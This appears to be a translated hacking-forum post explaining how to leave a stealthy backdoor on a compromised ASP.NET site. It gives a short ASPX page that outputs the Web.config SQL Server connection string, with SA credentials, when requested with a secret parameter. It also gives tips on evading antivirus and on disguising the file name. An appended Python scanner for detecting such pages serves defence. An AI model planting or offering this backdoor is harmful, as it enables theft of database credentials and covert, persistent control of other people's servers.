Leave a YD "backdoor" in an ASP.NET website

Source: Internet
Author: User

One night I was thinking about what kind of relatively YD backdoor to leave in an ASP.NET site, and I went round and round with no result. I started with a one-sentence shell, but useful as that thing is, it is all in vain when people don't let you write files. Leave a pony or a horse? Then I thought of a very YD door. As for the use of the door, I meant it to be used (seemingly nonsense). It fits the following situations:

1. The environment supports ASP.NET (it does not work where ASP.NET is not supported).
2. The site uses an MSSQL database (90% of the systems I want to fix are ASP.NET + MSSQL. As for ACCESS, you can also create a news publishing system with it.)
3. Web.config contains a connection string (What is Web.config? Go ask Baidu, I cannot explain it clearly. A system usually writes its connection strings there so they can be reused.)
4. It is best if the connection uses the SA permission (otherwise this backdoor will not work).

If you have developed a system in ASP.NET, please skip this; I believe you already know what I want to say (don't throw bricks at me; take them home and save them for N years to build a house).

The following is the YD backdoor code:

    <%@ Page Language="C#" %>
    <%@ Import Namespace="System.Configuration" %>
    <%-- a check so that not just anyone browsing to the page sees the output --%>
    <% if (Request.Params["action"] == "len") { %>
    <%-- constr corresponds to the name value in Web.config; change it to match --%>
    <%= ConfigurationManager.ConnectionStrings["constr"] %>
    <% } %>

Example of the connection string in Web.config:

    <connectionStrings>
      <add name="constr" connectionString="Data Source=127.0.0.1;Initial Catalog=WebDB;User ID=sa;Password=!@#$12348888;" providerName="System.Data.SqlClient" />
    </connectionStrings>

Find the connectionStrings node in Web.config; the add element at the next level is the connection string. Its name value, constr, corresponds to the constr used in the backdoor.

Using the backdoor (here the backdoor is named demo.aspx in the root directory; any directory name on the site can be used):

    http://127.0.0.1/demo.asp?action=len

View the backdoor in the browser, and the effect is displayed. The damn SQL connection string you want is displayed, and it is the SA permission. What you can do next, don't ask me. In action=len, note that len is case sensitive.

Well, the rest is for you folks to use yourselves. I just accidentally thought of this, and I don't know whether you need it. There are limitations, however, and I only know the effect after testing.

The advantages of the backdoor are also described here. First, I don't have to think about being killed (360 wants to kill me? Big Brother, that's normal code). Second, the permission won't be lost, because of the prerequisites I listed before using it. With the SA permission, you may not allow me to write files, but you still have no permission. In addition, disguise the file name. Do not upload a file named 1.asp, or you should stop looking for me.

Okay, I have to go to bed... I hope this is of use to you folks.
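A defender-side check for the pattern described above, as an added example that is not code from the original post: it scans ASP.NET page source for server-side blocks that render a ConfigurationManager.ConnectionStrings value into the response. The function names and sample pages are constructed for illustration, and treating a plain code block as a leak only when it also calls Response.Write is an assumed heuristic.

```python
import re
from pathlib import Path

# Server-side blocks: <%= expr %>, <%: expr %> and <% code %>.
# Directives (<%@ ... %>) and server comments (<%-- ... --%>) are skipped.
BLOCK = re.compile(r"<%(?!\s*@|--)\s*([=:]?)(.*?)%>", re.S)
# Connection strings read through either configuration manager class.
SECRET = re.compile(r"\b(?:Web)?ConfigurationManager\s*\.\s*ConnectionStrings\b", re.I)
WRITE = re.compile(r"\bResponse\s*\.\s*Write\s*\(", re.I)
PAGE_SUFFIXES = {".aspx", ".ascx", ".master"}

def find_config_leaks(source):
    """Return (line_number, snippet) for blocks that render a connection string."""
    hits = []
    for m in BLOCK.finditer(source):
        kind, body = m.group(1), m.group(2)
        if not SECRET.search(body):
            continue
        # Expression blocks always emit their value; plain code blocks
        # are flagged only when they also call Response.Write (heuristic).
        if kind or WRITE.search(body):
            line = source.count("\n", 0, m.start()) + 1
            hits.append((line, " ".join(m.group(0).split())))
    return hits

def scan_tree(root):
    """Scan every page-like file under root; returns (path, line, snippet)."""
    results = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PAGE_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="ignore")
            results += [(str(path), ln, s) for ln, s in find_config_leaks(text)]
    return results

# Constructed samples: the pattern from the post, and a page that only
# uses the connection string server-side without rendering it.
SUSPECT = '''<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<% if (Request.Params["action"] == "len") { %>
<%= ConfigurationManager.ConnectionStrings["constr"] %>
<% } %>
'''
BENIGN = '''<%@ Page Language="C#" %>
<% var cs = ConfigurationManager.ConnectionStrings["constr"].ConnectionString; %>
<%= DateTime.Now %>
'''
```

Run scan_tree over the web root as part of file-integrity review; every hit deserves a look, because a legitimate page has no reason to send its connection string to the browser.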
